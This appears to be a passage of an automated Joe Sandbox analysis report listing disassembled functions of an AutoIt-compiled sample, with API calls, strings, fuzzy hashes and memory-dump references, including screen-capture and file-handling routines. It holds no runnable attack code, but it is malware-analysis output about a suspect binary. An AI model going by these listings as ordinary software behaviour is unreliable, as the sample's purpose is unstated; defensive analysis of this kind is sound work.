Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 43082e63fa1cd918abfd170b9f53648772b6a58ec79450257a99286b63c028e7
Instruction ID: b83d3f97502179af71ad829a0419513dc9ca1448af83c1aa25de772eff2cb1d7
Opcode Fuzzy Hash: 43082e63fa1cd918abfd170b9f53648772b6a58ec79450257a99286b63c028e7
Instruction Fuzzy Hash: D43101B1D483196ADF109FB68C899AFBFE8FF04750F50453BA50CE7280DA78A5018F95

Function 0041A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041A259
DestroyWindow.USER32(?,?), ref: 0041A2D3

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0041A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0041A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041A382
DestroyWindow.USER32(00000000), ref: 0041A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00390000,00000000), ref: 0041A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041A3F4
GetDesktopWindow.USER32 ref: 0041A40D
GetWindowRect.USER32(00000000), ref: 0041A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0041A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0041A444

Part of subcall function 003925DB: GetWindowLongW.USER32(?,000000EB), ref: 003925EC

Strings

tooltips_class32, xrefs: 0041A346, 0041A3D4
0, xrefs: 0041A26F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: caecb069ca714c9fecbd4bef55af3d8e775e234a97ccc60e4aaad614635e309c
Instruction ID: fe76ebd6834fd75b5de213abcc54fa1634600a41c846e797c50fd79736ef9698
Opcode Fuzzy Hash: caecb069ca714c9fecbd4bef55af3d8e775e234a97ccc60e4aaad614635e309c
Instruction Fuzzy Hash: 4E715770140205AFDB21DF28C849FAA7BE5FB88704F04452EF9858B2A1D778E956CB5A

Function 00414392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00414424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0041446F

Strings

CHECK, xrefs: 0041448F
GETITEMCOUNT, xrefs: 00414551
UNCHECK, xrefs: 0041464B
GETTEXT, xrefs: 004145C2
EXISTS, xrefs: 004144D8
ISCHECKED, xrefs: 004145F2
EXPAND, xrefs: 00414521
SELECT, xrefs: 00414620
GETSELECTED, xrefs: 0041457F
GETTOTALCOUNT, xrefs: 00414456
COLLAPSE, xrefs: 004144B5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 85043bde84f8826f24f75024f553a25dd3cfb8c69cc03d2a72ee3d8e18be0150
Instruction ID: 997f9f9ed97b89c870e43ce399c33b391a8aed046cb10996dd6d554ecf20121d
Opcode Fuzzy Hash: 85043bde84f8826f24f75024f553a25dd3cfb8c69cc03d2a72ee3d8e18be0150
Instruction Fuzzy Hash: AE91AD302043019FCB05EF14C452BAEB7E1AF95354F14886EF8965B7A2DB38EC4ACB85

Function 0041B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0041B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004191C2), ref: 0041B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0041B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0041B9C3
FreeLibrary.KERNEL32(?), ref: 0041B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0041B9DF
DestroyIcon.USER32(?,?,?,?,?,004191C2), ref: 0041B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0041BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0041BA17

Part of subcall function 003B2EFD: __wcsicmp_l.LIBCMT ref: 003B2F86

Strings

.dll, xrefs: 0041B86D
.exe, xrefs: 0041B84A
.icl, xrefs: 0041B82A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 42c00b809b515d526ef4d528a400c19bcd1ed6cbdd03dddaceaff066436073df
Instruction ID: fdc7b331a3d6355fc4a2872913d85bb71bb786eb3a75923df80e23b22a7d8a89
Opcode Fuzzy Hash: 42c00b809b515d526ef4d528a400c19bcd1ed6cbdd03dddaceaff066436073df
Instruction Fuzzy Hash: C661CEB1510215BAEB15DF64CC41BFB7BACFB08710F10821AFA15DA1C0DB789982DBA4

Function 003FDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 003FDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 003FDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003FDCF8
__wsplitpath.LIBCMT ref: 003FDD56
_wcscat.LIBCMT ref: 003FDD6E
_wcscat.LIBCMT ref: 003FDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003FDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 003FDDFC
_wcscpy.LIBCMT ref: 003FDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003FDE47

Strings

*.*, xrefs: 003FDE02

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 19c7193ec9fedcb08d2fe625ce1e3fdccabfd6d60c78d535ceae1c1c5e8c20aa
Instruction ID: cc0060a12cb1bef85dab2500c3fa9d29bfe331efe4b98973344c00949eff71b1
Opcode Fuzzy Hash: 19c7193ec9fedcb08d2fe625ce1e3fdccabfd6d60c78d535ceae1c1c5e8c20aa
Instruction Fuzzy Hash: 306180721042099FCB11EF24C845AAEB3E9FF89314F04492EFA99CB251DB31E945CB51

Function 003F9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 003F9C7F

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 003F9CA0
__swprintf.LIBCMT ref: 003F9CF9
__swprintf.LIBCMT ref: 003F9D12
_wprintf.LIBCMT ref: 003F9DB9
_wprintf.LIBCMT ref: 003F9DD7

Strings

"%s" (%d) : ==> %s:, xrefs: 003F9DD2
"%s" (%d) : ==> %s:%s%s, xrefs: 003F9DB4
Line %d (File "%s"):, xrefs: 003F9CF3, 003F9D0C
Incorrect parameters to object property !, xrefs: 003F9D5B
^ ERROR , xrefs: 003F9D4E
Error: , xrefs: 003F9D81

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 9ddc761a92bd0566838551adfb240e844a201f64856e0aa316b560948c09ab68
Instruction ID: ede945ab4cb9a14f361b5e12adb32a69c3be54cba271ddb73afdfbf4d518a5fc
Opcode Fuzzy Hash: 9ddc761a92bd0566838551adfb240e844a201f64856e0aa316b560948c09ab68
Instruction Fuzzy Hash: A0518E32900609AADF16EBE0CD46FFEB778AF14300F600166B505760A2EB356E59DF64

Function 003FA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

CharLowerBuffW.USER32(?,?), ref: 003FA3CB
GetDriveTypeW.KERNEL32 ref: 003FA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003FA4C5

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

Strings

closed, xrefs: 003FA3DF, 003FA3E8
open , xrefs: 003FA427
close, xrefs: 003FA3D1
wait, xrefs: 003FA482
close cd wait, xrefs: 003FA4B0
type cdaudio alias cd wait, xrefs: 003FA443
set cd door , xrefs: 003FA466
open, xrefs: 003FA3F2

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: ff44054dbe9852a24a11aa5e67be6308d2e2ab7584ab72d8a34f5700dd8e1d83
Instruction ID: 8e620d0f157f4863250125f567a72816ab5fdb2688d5f46f737ff1f6fc2b81f0
Opcode Fuzzy Hash: ff44054dbe9852a24a11aa5e67be6308d2e2ab7584ab72d8a34f5700dd8e1d83
Instruction Fuzzy Hash: 19516EB11187059FDB01EF25C88196EB3E4FF94718F10886DF8999B2A1DB71ED0ACB42

Function 003EF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,003CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 003EF8DF
LoadStringW.USER32(00000000,?,003CE029,00000001), ref: 003EF8E8

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,003CE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 003EF90A
LoadStringW.USER32(00000000,?,003CE029,00000001), ref: 003EF90D
__swprintf.LIBCMT ref: 003EF95D
__swprintf.LIBCMT ref: 003EF96E
_wprintf.LIBCMT ref: 003EFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EFA2E

Strings

^ ERROR, xrefs: 003EF9C3
Line %d (File "%s"):, xrefs: 003EF957
%s (%d) : ==> %s: %s %s, xrefs: 003EFA12
Error: , xrefs: 003EF9E5
Line %d:, xrefs: 003EF968

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: a3bd7953e8565e057e2f52e3e5a0412885bd7f3b60cfabc859b79580ca08a607
Instruction ID: acafb5e8fe93669336275e8e4e5755b7ee5df476e6448fd3bef893c576ae7001
Opcode Fuzzy Hash: a3bd7953e8565e057e2f52e3e5a0412885bd7f3b60cfabc859b79580ca08a607
Instruction Fuzzy Hash: F2414C72800219AADF16FBE0DD86EEEB778AF18300F500165F505BA0D2EB756F49CB65

Function 0041BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00419207,?,?), ref: 0041BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA85
GlobalLock.KERNEL32(00000000), ref: 0041BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0041BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00419207,?,?,00000000,?), ref: 0041BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00422CAC,?), ref: 0041BAD7
GlobalFree.KERNEL32(00000000), ref: 0041BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0041BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0041BB36
DeleteObject.GDI32(00000000), ref: 0041BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041BB74

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: d772e5bea1c654106e72a33f6d341f6f705394f47b6f65597c6378022a9b08e6
Instruction ID: 6dff5ffd3793f6080ee96df47e893f61c94ce591bba50fd285f5be69cc79e925
Opcode Fuzzy Hash: d772e5bea1c654106e72a33f6d341f6f705394f47b6f65597c6378022a9b08e6
Instruction Fuzzy Hash: DE414575600208BFCB119F65DC88EEBBBB8EF89711F108069F909D7260D734AE46CB64

Function 003FD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 003FDA10
_wcscat.LIBCMT ref: 003FDA28
_wcscat.LIBCMT ref: 003FDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003FDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 003FDA63
GetFileAttributesW.KERNEL32(?), ref: 003FDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 003FDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 003FDAA7

Strings

*.*, xrefs: 003FDAE6

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 1b9022f9ac20364b99ce7b5cb7b49f68d935ba6d2f12e5b49477b00c8899b97f
Instruction ID: 46337ace03a17beb3ffd3a62981eab4a805cb647e64997c325a89050dbcb57b4
Opcode Fuzzy Hash: 1b9022f9ac20364b99ce7b5cb7b49f68d935ba6d2f12e5b49477b00c8899b97f
Instruction Fuzzy Hash: A781B4715043499FCB22DFA4C848ABBB7E9AF89310F15482EF989CB251E770DD45CB52

Function 0041C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0041C1FC
GetFocus.USER32 ref: 0041C20C
GetDlgCtrlID.USER32(00000000), ref: 0041C217
_memset.LIBCMT ref: 0041C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0041C36D
GetMenuItemCount.USER32(?), ref: 0041C38D
GetMenuItemID.USER32(?,00000000), ref: 0041C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0041C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0041C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0041C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0041C489

Strings

0, xrefs: 0041C33A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 29cabfcaa90144834676862adca0c4aa9f6d66e2748c6d914a0d87db557084e4
Instruction ID: 03172cf9e74bae6566fd177a55e99afab32005fc4a3709ac9207628358a64647
Opcode Fuzzy Hash: 29cabfcaa90144834676862adca0c4aa9f6d66e2748c6d914a0d87db557084e4
Instruction Fuzzy Hash: 3181AE70648311AFD710CF14CC94ABBBBE9FB88714F00892EF99597291D734D885CB9A

Function 0040731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0040738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0040739B
CreateCompatibleDC.GDI32(?), ref: 004073A7
SelectObject.GDI32(00000000,?), ref: 004073B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00407408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00407444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00407468
SelectObject.GDI32(00000006,?), ref: 00407470
DeleteObject.GDI32(?), ref: 00407479
DeleteDC.GDI32(00000006), ref: 00407480
ReleaseDC.USER32(00000000,?), ref: 0040748B

Strings

(, xrefs: 00407410

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: dde9fec146f312b969e47f658c34a1b3747ba3f4bd2a26ede3716fad17845c35
Instruction ID: d9ae33f1c50451d5aa4679b876c58dd655a6e1cc7fede934b5505800a0eb65e1
Opcode Fuzzy Hash: dde9fec146f312b969e47f658c34a1b3747ba3f4bd2a26ede3716fad17845c35
Instruction Fuzzy Hash: E6515871A04209EFDB14CFA8CC84EAFBBB9EF48310F14842EF95AA7251C735A945CB54

Function 00396A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 003B0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00396B0C,?,00008000), ref: 003B0973

Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00396BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00396CFA

Part of subcall function 0039586D: _wcscpy.LIBCMT ref: 003958A5

Part of subcall function 003B363D: _iswctype.LIBCMT ref: 003B3645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 003CE421
Bad directive syntax error, xrefs: 003CE79D
>>>AUTOIT SCRIPT<<<, xrefs: 003CE496
EA06, xrefs: 003CE452
Unterminated string, xrefs: 003CE7E4
Error opening the file, xrefs: 003CE43D, 003CE4B8
AU3!, xrefs: 00396B61

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 9dfd0cf2f83a4a610d4bd84201e43871378fd84b6d7c1ea072c03245235ab453
Instruction ID: 1333cb36dfd7224a2b72863a304db02e42a8315ad253f8ea922177ef1a9cbd7d
Opcode Fuzzy Hash: 9dfd0cf2f83a4a610d4bd84201e43871378fd84b6d7c1ea072c03245235ab453
Instruction Fuzzy Hash: C0029D311083419FCB26EF24C891EAFBBE5EF95354F10492DF4999B2A2DB30D949CB52

Function 003F2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 003F2DDD
GetMenuItemCount.USER32(00455890), ref: 003F2E66
DeleteMenu.USER32(00455890,00000005,00000000,000000F5,?,?), ref: 003F2EF6
DeleteMenu.USER32(00455890,00000004,00000000), ref: 003F2EFE
DeleteMenu.USER32(00455890,00000006,00000000), ref: 003F2F06
DeleteMenu.USER32(00455890,00000003,00000000), ref: 003F2F0E
GetMenuItemCount.USER32(00455890), ref: 003F2F16
SetMenuItemInfoW.USER32(00455890,00000004,00000000,00000030), ref: 003F2F4C
GetCursorPos.USER32(?), ref: 003F2F56
SetForegroundWindow.USER32(00000000), ref: 003F2F5F
TrackPopupMenuEx.USER32(00455890,00000000,?,00000000,00000000,00000000), ref: 003F2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003F2F7E

Memory Dump Source

